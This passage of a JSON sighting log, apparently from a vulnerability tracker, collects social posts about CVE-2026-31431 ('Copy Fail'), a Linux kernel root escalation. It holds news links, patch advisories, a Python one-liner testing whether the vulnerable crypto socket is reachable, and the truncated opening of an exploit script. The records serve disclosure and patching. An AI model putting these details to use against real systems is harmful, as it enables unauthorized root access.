"author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/lampsofgold.veoh.social.ap.brid.gy/post/3mkpz6kljg572", "content": "@mntmn looks like there\u2019s an aarch64 port https://github.com/theori-io/copy-fail-CVE-2026-31431/pull/25", "creation_timestamp": "2026-04-30T16:16:24.346711Z"}, {"uuid": "fccde9ef-75ba-4b57-9e30-48b7c1e63c97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkpzr5h2th25", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T16:26:47.142428Z"}, {"uuid": "4146553c-1f2e-4f9c-a30e-e7996c165353", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkpzxujny62s", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T16:30:32.598522Z"}, {"uuid": "4059e598-c5a2-4374-a893-6e1a8cfb17b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkq27k433p2v", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T16:34:50.009044Z"}, {"uuid": "84758647-e254-471d-804e-c4473e751fc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/canartuc.com/post/3mkq2arf6e72p", "content": "Xint Code disclosed CopyFail (CVE-2026-31431) Wednesday. Logic bug in the kernel crypto socket layer from a 2017 commit. Nine years on every major distro. Fuzzing missed it. Static analysis missed it. AI-assisted review caught it. Rust would not have, this is logic.\n\n#Linux #InfoSec #OpenSource", "creation_timestamp": "2026-04-30T16:35:31.330211Z"}, {"uuid": "7475ed26-25f9-43d5-968b-4c4860c88e91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/iwate.me/post/3mkq2k2afdn2p", "content": "[AUTO] I read this.\n\nLinux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u300cCopyFail (CVE-2026-31431)\u300d\u3092EC2\u306eUbuntu 22.04\u3067\u5b9f\u8a3c\u3057\u3066\u307f\u305f\nhttps://zenn.dev/aeyesec/articles/7e4a1e3c83e81b", "creation_timestamp": "2026-04-30T16:40:42.461637Z"}, {"uuid": "1a1bcc08-ab7e-486f-ab21-f5d88ed1c235", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/netsecio.bsky.social/post/3mkpuazkvuz2w", "content": "\u26a0\ufe0f Critical 'Copy Fail' Linux flaw (CVE-2026-31431) allows any local user to get instant root access! Affects distros since 2017 like Ubuntu, Debian, RHEL. A simple, reliable exploit exists. Patch now! #Linux #CyberSecurity #LPE", "creation_timestamp": "2026-04-30T14:48:18.538166Z"}, {"uuid": "497b1dd4-4853-4fa3-93e5-b4bdb0d83817", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ostechnix.bsky.social/post/3mkpv6xnioc2b", "content": "Copy Fail (CVE-2026-31431) is a severe logic flaw in the Linux kernel affecting almost every distribution since 2017. Patch your systems now!\n\nMore details here: ostechnix.com/copy-fail-cv... \n\n#Copyfail #CVE202631431 #Pagecache #Linuxkernel #LinuxPrivilegeEscalation #Security #XintCode #TaeyangLee", "creation_timestamp": "2026-04-30T15:05:07.662925Z"}, {"uuid": "6fc3c360-3dc6-4712-8ebe-65d670517c89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/jianmin.defcon.social.ap.brid.gy/post/3mkpv2co5snh2", "content": "`python3 -c 'import socket; s=socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0); s.bind((\"aead\",\"authencesn(hmac(sha256),cbc(aes))\")); print(\"REACHABLE\")' 2>&1`\n\nIf you see: \"file not found\" then you're probably not vulnerable to copy.fail (CVE-2026-31431)\n\nIf you see \"REACHABLE,\" that [\u2026]", "creation_timestamp": "2026-04-30T15:05:22.456779Z"}, {"uuid": "a28dc140-d377-41e2-af49-e1a0f23694ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linuxiac.bsky.social/post/3mkpvdpso5k25", "content": "Copy Fail (CVE-2026-31431) is a Linux kernel vulnerability that allows local unprivileged users to gain root access on affected systems.\nlinuxiac.com/copy-fail-li...\n\n#Linux #Kernel #OpenSource", "creation_timestamp": "2026-04-30T15:07:46.691202Z"}, {"uuid": "bc1da2f3-28be-4638-ba0a-a550cf365b4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/egghat.bsky.social/post/3mkq2way7zv2t", "content": "Oops.\n\n\u201eIf your kernel was built between 2017 and the patch \u2014 which covers essentially every mainstream Linux distribution \u2014 you're in scope.\u201c\n\nCopy Fail \u2014 CVE-2026-31431 copy.fail\n#BadNews", "creation_timestamp": "2026-04-30T16:47:32.774775Z"}, {"uuid": "15f6402a-90e7-4620-b388-472d86851c50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/captechgroup.com/post/3mkq2waszmp2n", "content": "CVE-2026-31431 gives any local user reliable root access on Linux systems deployed since 2017, with no race conditions needed and no forensic traces left behind. #infosec #cybersecurity", "creation_timestamp": "2026-04-30T16:47:33.314794Z"}, {"uuid": "55cf6e44-b903-4189-9e83-0541ccabe7c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/codeenigma.toots.codeenigma.com.ap.brid.gy/post/3mkq2ryjeosl2", "content": "In case anyone is wondering about exposure to #CopyFail, CVE-2026-31431, well we're exposed of course, like everyone. Currently waiting for a #Debian patch to drop. unattended-upgrades will take care of applying it and we will take care of reboots as required.\n\nFORTUNATELY, in almost every case [\u2026]", "creation_timestamp": "2026-04-30T16:47:42.867419Z"}, {"uuid": "a38e5f7d-69b4-4a92-828a-f5128536666a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/codeenigma.toots.codeenigma.com.ap.brid.gy/post/3mkq2ua423fv2", "content": "Related links:\n\nhttps://copy.fail/\nhttps://security-tracker.debian.org/tracker/CVE-2026-31431", "creation_timestamp": "2026-04-30T16:49:20.896241Z"}, {"uuid": "b127a3d5-bfde-45ed-a157-12b8da120133", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/AAKL/statuses/116494699869475729", "content": "New.\n\"Hello! Yes, it's all a disaster again!\"\nWatch Tower: The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940) https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/ #threatresearch \nAlso:\nTenable: Copy Fail (CVE-2026-31431): Frequently asked questions about Linux kernel privilege escalation vulnerability https://www.tenable.com/blog/copy-fail-cve-2026-31431-frequently-asked-questions-about-linux-kernel-privilege-escalation @tenable #Linux #infosec #vulnerability", "creation_timestamp": "2026-04-30T16:54:12.966621Z"}, {"uuid": "1cd8e428-b107-4e4c-9381-037cd9e44fa5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/epowo-uzata.mast.qixto.com.ap.brid.gy/post/3mkq4lw5cy6h2", "content": "Kopiointi ep\u00e4onnistui: Linux-ytimen LPE mahdollistaa roottauksen 10-rivisell\u00e4 Python-skriptill\u00e4 CVE-2026-31431, nimelt\u00e4\u00e4n Copy Fail, hy\u00f6dynt\u00e4\u00e4 Linux-ytimen authencesn\n\nhttps://www.theregister.com/2026/04/30/linux_cryptographic_code_flaw/", "creation_timestamp": "2026-04-30T17:17:35.781060Z"}, {"uuid": "2844e5af-2b39-4e6b-ab9f-0515c93b64cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/upsun.com/post/3mkq4pfzpkc25", "content": "We are aware of the recently disclosed copy.fail vulnerability (CVE-2026-31431) and want to assure our customers that Upsun systems are not affected. The module targeted by this vulnerability is disabled in our platform. There is no risk of exploitation, and no action is required on your part. \u2728 1/3", "creation_timestamp": "2026-04-30T17:19:30.654806Z"}, {"uuid": "3f000655-74b6-4996-8059-06894783b4f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/upsun.com/post/3mkq4pfzugk25", "content": "We are aware of the recently disclosed copy.fail vulnerability (CVE-2026-31431) and want to assure our customers that Upsun systems are not affected. The module targeted by this vulnerability is disabled in our platform. There is no risk of exploitation, and no action is required on your part. \u2728 1/3", "creation_timestamp": "2026-04-30T17:19:31.836980Z"}, {"uuid": "918da6db-9d1c-43ae-8c03-5e4a738b3564", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/derdreschi84.bsky.social/post/3mkq55flkes2g", "content": "Copy Fail #Linux Kernel Flaw Allows Local Users to Gain Root\n\nCopy Fail (CVE-2026-31431) is a Linux kernel vulnerability that allows local unprivileged users to gain root access on affected systems.", "creation_timestamp": "2026-04-30T17:27:22.813945Z"}, {"uuid": "e61d4343-1a2e-46e3-84c9-9e7b8c5d689f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/potato.software/post/3mkq56enhxs25", "content": "Critical #LinuxKernel vulnerability 'Copy Fail' (CVE-2026-31431) grants root access across major distributions since 2017. Immediate patching recommended. #PotatoSecurity #Linux #Vulnerability Link: thedailytechfeed.com/critical-lin...", "creation_timestamp": "2026-04-30T17:27:51.979284Z"}, {"uuid": "58c3d55f-ef25-42ce-ba5e-d4f1fcc086aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkq5ojctew2x", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T17:36:54.031232Z"}, {"uuid": "0fb4a576-9a5f-4295-a3ed-3dbb415d9959", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkq755f5zn2s", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T18:02:58.518756Z"}, {"uuid": "d2dfd964-b2e7-40ef-a926-71e36332e656", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ciq.com/post/3mkq77seepu2m", "content": "CVE-2026-31431 (Copy Fail) is a Linux kernel privilege escalation vulnerability with a public exploit now in the wild. It affects Rocky Linux 8, 9, and 10.\nHere is how CIQ is responding. kb.ciq.com/article/rock...", "creation_timestamp": "2026-04-30T18:04:29.411014Z"}, {"uuid": "c490b9de-6d61-4eb2-bba2-8d4de14c846e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/thedailytechfeed.com/post/3mkq44qmae72c", "content": "Critical #LinuxKernel vulnerability 'Copy Fail' (CVE-2026-31431) grants root access across major distributions since 2017. Immediate patching recommended. #CyberSecurity #Linux #Vulnerability Link: thedailytechfeed.com/critical-lin...", "creation_timestamp": "2026-04-30T17:09:05.496194Z"}, {"uuid": "2516ff9a-fd70-476c-bd01-7123cd02d3d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/upsun.com/post/3mkq4pfzvfs25", "content": "We are aware of the recently disclosed copy.fail vulnerability (CVE-2026-31431) and want to assure our customers that Upsun systems are not affected. The module targeted by this vulnerability is disabled in our platform. There is no risk of exploitation, and no action is required on your part. \u2728 1/3", "creation_timestamp": "2026-04-30T17:19:35.238890Z"}, {"uuid": "ee52cc81-f15a-42ab-be2a-31b4f641a49e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/cyberkendra.com/post/3mkonl22o6k23", "content": "A 732-Byte Python Script Can Get Root on Every Major Linux Distro\nCVE-2026-31431 \"Copy Fail\": a logic bug in the Linux kernel lets any local user get root on Ubuntu, RHEL, Amazon Linux, and SUSE since 2017.\nRead Details- www.cyberkendra.com/2026/04/a-73... \n#linux #ubuntu #copyfail #security", "creation_timestamp": "2026-04-30T03:16:02.215027Z"}, {"uuid": "333fa63b-b55a-4202-b1f7-36db7ad8cc08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/theitnerd.ca/post/3mkq4jiyuei27", "content": "Copy Fail Linux vuln allows root\u00a0access\n\nYesterday, Theori disclosed\u00a0CVE-2026-31431, dubbed\u00a0Copy Fail, a Linux kernel vulnerability that allows any unprivileged local user to gain root access on virtually every major Linux distribution shipped since 2017. In the Linux kernel, the following\u2026", "creation_timestamp": "2026-04-30T17:16:11.893065Z"}, {"uuid": "61a600d7-a1c8-4327-ab32-42e4ee057c60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkq4l6u2tt2v", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T17:17:08.483737Z"}, {"uuid": "da04b6c3-b37e-43de-8aca-fda1fc93cdc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Kubernetes.activitypub.awakari.com.ap.brid.gy/post/3mkq7nqpalqs2", "content": "Copy Fail Linux vuln allows root access Yesterday, Theori disclosed CVE-2026-31431, dubbed Copy Fail, a Linux kernel vulnerability that allows any unprivileged local user to gain root access on v...\n\n#Commentary #LINUX\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T18:12:22.516785Z"}, {"uuid": "bc5d2ec3-8fce-4251-bf14-6c1eebae96e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pixelsandpulse.bsky.social/post/3mkq7pa5sr72q", "content": "The 'Copy Fail' vulnerability (CVE-2026-31431) has been silently giving hackers root access on Linux since 2017. This isn't just another bug; it's a fundamental challenge to container security. Find out how it works and why patching is\u2026\n\nhttps://www.tpp.blog/2i0m9zn\n\n#opensource #linux #copyfail", "creation_timestamp": "2026-04-30T18:13:06.894998Z"}, {"uuid": "584ac4ce-fd94-4ae6-bdf9-91e37238d8c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosecbot.bsky.social/post/3mkq7ujxok52e", "content": "Some notes on Copy Fail or CVE-2026-31431, found by Xint Code (\nhttps://\nxint.io/blog/copy-fail\n-linux-distributions\n\u2026). This is a very stable and very straightforward exploit. It worked almost on anything I tested and in some cases,\u2026\n\n\u2014 from @craiu (https://x.com/craiu/status/2049810338577584637)", "creation_timestamp": "2026-04-30T18:16:03.739777Z"}, {"uuid": "a4494b32-9a9a-49ff-8934-edd693964a45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sinologic.net/post/3mkqebri5iq2b", "content": "Copy Fail (CVE-2026-31431): la IA encuentra un exploit de 732 bytes que da root en cualquier Linux desde 2017\n\nUn fallo l\u00f3gico en el subsistema criptogr\u00e1fico del kernel de Linux lleva casi un\u2026\n\n#copy_fail #CVE #exploit #IA #Inteligencia_Artificial #kernel #Linux #root #Seguridad #vulnerabilidad", "creation_timestamp": "2026-04-30T19:35:04.686926Z"}, {"uuid": "904ec88d-b967-4d89-8af0-50693178ba96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newstecnicas.info.ve/post/3mkqeqxlstc2w", "content": "\ud83d\udc27 \u00bfC\u00f3mo funciona 'Copy Fail'? El #exploit de 732 bytes que otorga acceso #Root en #Linux (CVE-2026-31431) (+MITIGACI\u00d3N) www.newstecnicas.info.ve/2026/04/copy...", "creation_timestamp": "2026-04-30T19:43:58.426836Z"}, {"uuid": "6e96c342-9915-4ad3-b66a-98a7a4fe1019", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/vukinaj.bsky.social/post/3mkqbxeavm22f", "content": "Tak #update, p\u0159\u00e1tel\u00e9. \n\n#CopyFail a sledovan\u00fd jako CVE-2026-31431\n\n#Linux \n\ncybernews.com/security/cri...", "creation_timestamp": "2026-04-30T18:53:30.868666Z"}, {"uuid": "4bb6f500-376f-48c2-805c-3663298354ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mkqcfbtk7v2x", "content": "CVE-2026-31431: The 732-Byte Linux Rootkit That Hid for 9 Years \u2013 Update Now! +\u00a0Video\n\nIntroduction: A recently disclosed Linux kernel vulnerability, CVE-2026-31431, allows any local user to gain root access using a mere 732-byte Python script. This flaw has remained undetected in all major Linux\u2026", "creation_timestamp": "2026-04-30T19:01:15.769263Z"}, {"uuid": "91cd157d-aed2-4fd5-a9ab-fb56315cc33d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn-frontpage-bot.bsky.social/post/3mkqdbcrscg2o", "content": "A critical Linux kernel vulnerability (CVE-2026-31431) allowing local privilege escalation, introduced in kernel 4.14, has been fixed in versions 6.18.22, 6.19.12, and 7.0. Older long-term kernels are still vulnerable as the fix does not apply cleanly.", "creation_timestamp": "2026-04-30T19:16:53.240764Z"}, {"uuid": "4fa2a245-3dcc-4d09-8120-ce05269d44b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ArtHarg.mastodon.nl.ap.brid.gy/post/3mkooyorktto2", "content": "RE: https://cloudisland.nz/@sitharus/116490365343384634\n\nThat\u2019s a scary one: https://www.bugcrowd.com/blog/what-we-know-about-copy-fail-cve-2026-31431/", "creation_timestamp": "2026-04-30T03:41:33.420419Z"}, {"uuid": "7e657e60-427a-466b-a2ab-230eb08e9de0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/feilong76.bsky.social/post/3mkqjrylosc2f", "content": "\u201c\u300cCopy Fail\u300dCVE-2026-31431 \u2014 9\u5e74\u9593\u6f5c\u3093\u3067\u3044\u305f732\u30d0\u30a4\u30c8Python\u3067Linux\u304croot\u5316\u3055\u308c\u308b\u8106\u5f31\u6027\u3068\u5bfe\u7b56\uff5czephel01\u201d htn.to/2xkDgYxA9M", "creation_timestamp": "2026-04-30T21:13:41.161124Z"}, {"uuid": "eb0ae852-2cc9-4655-8a4a-3bfab9a23d83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3mkqjui6enr42", "content": "Nine-Year-Old Linux Kernel Flaw Grants Unprivileged Users Full Root Access CVE-2026-31431 \"Copy Fail\" \u2014 a 732-byte Python script gives unprivileged users root on Ubuntu, RHEL, Amazon Linu...\n\n#TIGR #vulnerability\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T21:15:04.064055Z"}, {"uuid": "528ed6fe-a9a4-442c-b603-542324ffbf0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/appinn.bsky.social/post/3mkop76oj7u2y", "content": "\u53ea\u9700\u898110\u884c\u4ee3\u7801\uff0c\u5c31\u80fd\u83b7\u5f97\u81ea2017\u5e74\u81f3\u4eca\u5927\u591a\u6570 Linux \u53d1\u884c\u7248\u672c\u7684 root \u6743\u9650\u3002\u53f2\u79f0 Copy\u00a0Fail\uff0c\u6f0f\u6d1e\u7f16\u53f7 CVE-2026-31431 \u5148\u770b\u63d0\u6743\u6f14\u793a\u89c6\u9891 \u6f14\u793a\u4ee3\u7801 \u4ee3\u7801\u6765\u81ea\u8fd9\u91cc\uff0c\u8bf7\u4ec5\u5728\u81ea\u5df1\u7684\u673a\u5668\u4e0a\u6d4b\u8bd5\u8be5\u6f0f\u6d1e\uff1a #!/usr/bin/env python3 import os as g,zlib,socket", "creation_timestamp": "2026-04-30T03:45:07.175819Z"}, {"uuid": "f70233a3-0243-4f1d-adc4-b1db6fc7e0e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3mkqfohaqiak2", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Copy Fail \u0432 \u044f\u0434\u0440\u0435 Linux \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c root-\u0434\u043e\u0441\u0442\u0443\u043f Copy Fail (CVE-2026-31431) \u2014 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u044f\u0434\u0440\u0435 Linux: ...\n\n#\u0422\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0438\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T20:00:08.499549Z"}, {"uuid": "b7d4e7cc-8532-4e6c-ac84-a66ec64ab912", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/streetcoder.mastodon.social.ap.brid.gy/post/3mkqdlqtppmj2", "content": "@alanxoc3\n\nWTF CVE-2026-31431 #copyfail sounds bad!\n\nAnd there is already a YT video\n\nhttps://www.youtube.com/watch?v=PFLpDc909yY\n\n#securiy", "creation_timestamp": "2026-04-30T19:25:18.745976Z"}, {"uuid": "367f0b6c-7ab3-454a-bed2-72f9ddf03716", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/startuphub.bsky.social/post/3mkqfscmeil2i", "content": "Together AI details how it shut down the Copy Fail CVE-2026-31431 Linux kernel vulnerability, disabling a critical crypto socket interface to protect its AI infrastructure.\n\nhttps://www.startuphub.ai/ai-news/technology/2026/together-ai-halts-copy-fail-exploit", "creation_timestamp": "2026-04-30T20:02:11.191842Z"}, {"uuid": "2bc588cc-bb75-4548-aa4e-2a175290724d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Linux-Maintainers.activitypub.awakari.com.ap.brid.gy/post/3mkqfv57ht432", "content": "AL26-009 - Vulnerability Affecting Linux - CVE-2026-31431 Introduction to Malware Binary Triage (IMBT) Course Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor...\n\n#Malware #News\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T20:05:57.833691Z"}, {"uuid": "9e5ba3ff-d6d9-4fc4-9b9d-40c3e9adfaf8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/billstatler.forum.statler.ws.ap.brid.gy/post/3mkqg2x3b4qo2", "content": "From CVE-2026-31431, the list of Linux kernel versions that are affected by the vulnerability:\n\n**affected**\n\u2022 affected at 4.14\n\n**unaffected**\n\u2022 unaffected from 0 before 4.14\n\u2022 unaffected from 5.10.254 through 5.10.*\n\u2022 unaffected from 5.15.204 through 5.15.*\n\u2022 unaffected from 6.1.170 through 6 [\u2026]", "creation_timestamp": "2026-04-30T20:10:21.399276Z"}, {"uuid": "753448e8-9718-417d-aba8-62d9c5517ddd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Earl.mast.john1126.com.ap.brid.gy/post/3mkqgx54jwt52", "content": "So this tiny piece of Python code is responsible for Copy Fail (CVE-2026-31431)? I am considering testing this on one of my own machines to see if the exploit actually works. If it does, I will post a follow-up to warn others.\n\n#Linux #CopyFail", "creation_timestamp": "2026-04-30T20:22:50.516015Z"}, {"uuid": "317d1820-3d2b-4a45-aa8a-8399a9bfb0e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 